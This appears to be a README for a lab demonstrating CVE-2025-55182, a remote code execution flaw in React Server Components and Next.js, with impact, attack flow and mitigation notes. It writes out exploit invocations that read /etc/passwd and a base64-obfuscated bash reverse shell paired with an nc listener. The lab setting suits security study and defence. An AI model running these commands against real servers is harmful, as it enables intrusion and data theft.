Share
## https://sploitus.com/exploit?id=28C4CB73-5A44-5903-A568-FF06BACD544F
# React2Shell - CVE-2025-55182 Lab

A comprehensive laboratory for demonstrating and testing the critical vulnerability **CVE-2025-55182** in React Server Components.

## โš ๏ธ Educational Purpose Only

This repository is intended for:
- Security research and education
- Understanding vulnerability mechanisms
- Testing on your own systems
- Bug bounty hunting preparation

**Do not use against systems you don't own or have explicit permission to test. Unauthorized access is illegal.**

## ๐Ÿ”ด Vulnerability Details

- **CVE ID**: CVE-2025-55182
- **CVSS Score**: 10.0 (Critical)
- **Type**: Unauthenticated Remote Code Execution (RCE)
- **Affected Components**: 
  - React 19.0.0 - 19.2.0
  - Next.js 15.x - 16.x
- **Root Cause**: Unsafe deserialization in React Server Components "Flight" protocol

## โšก Capabilities

โœ… Execute arbitrary commands without authentication  
โœ… Read system files  
โœ… Create and modify files  
โœ… Establish reverse shell connections  
โœ… Achieve full server control  

## ๐Ÿš€ Quick Start

### 1. Installation
```bash
npm install --legacy-peer-deps
npm run dev
```

Server will start at `http://localhost:3000`

### 2. Check Vulnerability
```bash
bash check-cve.sh
```

### 3. Running Exploits
```bash
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
```

### 4. Reverse Shell
```bash
# Terminal 1 - Listener
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
```

## ๐Ÿ“ Project Structure
```
โ”œโ”€โ”€ app/              # Vulnerable Next.js application
โ”œโ”€โ”€ exploit/          # Working PoC exploit
โ”‚   โ””โ”€โ”€ rce_final.py  # Main exploit script
โ”œโ”€โ”€ check-cve.sh      # Automated vulnerability checker
โ”œโ”€โ”€ package.json      # Vulnerable dependencies
โ””โ”€โ”€ README.md
```

## ๐Ÿ”ง Technical Details

The vulnerability exists in the deserialization logic of React Server Components payloads. The exploit leverages prototype pollution to execute arbitrary code via `process.mainModule.require('child_process').execSync()`.

### Attack Flow
1. Craft malicious multipart form data
2. Send to vulnerable React application
3. Exploit unsafe deserialization in "Flight" protocol
4. Achieve RCE on the server

## ๐Ÿ“Š Impact

- **Confidentiality**: HIGH (read any file)
- **Integrity**: HIGH (modify/create files)
- **Availability**: HIGH (execute denial of service commands)

## โœ… Mitigation

1. Update React to 19.2.1 or later
2. Update Next.js to 15.0.5+ or 16.0.7+
3. Deploy Web Application Firewall (WAF) rules
4. Monitor server logs for exploitation attempts
5. Use runtime protection mechanisms

## ๐Ÿ“š References

- [react2shell.com](https://react2shell.com)
- [CVE-2025-55182 Details](https://vulners.com/cve/CVE-2025-55182)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [CVSS Calculator](https://www.first.org/cvss/calculator/3.1)

## โš–๏ธ Legal Disclaimer

This code is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. Unauthorized access to computer systems is illegal under laws such as the Computer Fraud and Abuse Act (CFAA) and similar legislation in other jurisdictions.

The author assumes no liability for misuse of this information.

## ๐ŸŽ“ Learning Outcomes

After working through this lab, you will understand:
- How unsafe deserialization vulnerabilities work
- Prototype pollution attack techniques
- React Server Components architecture
- RCE exploitation methods
- Proper vulnerability disclosure practices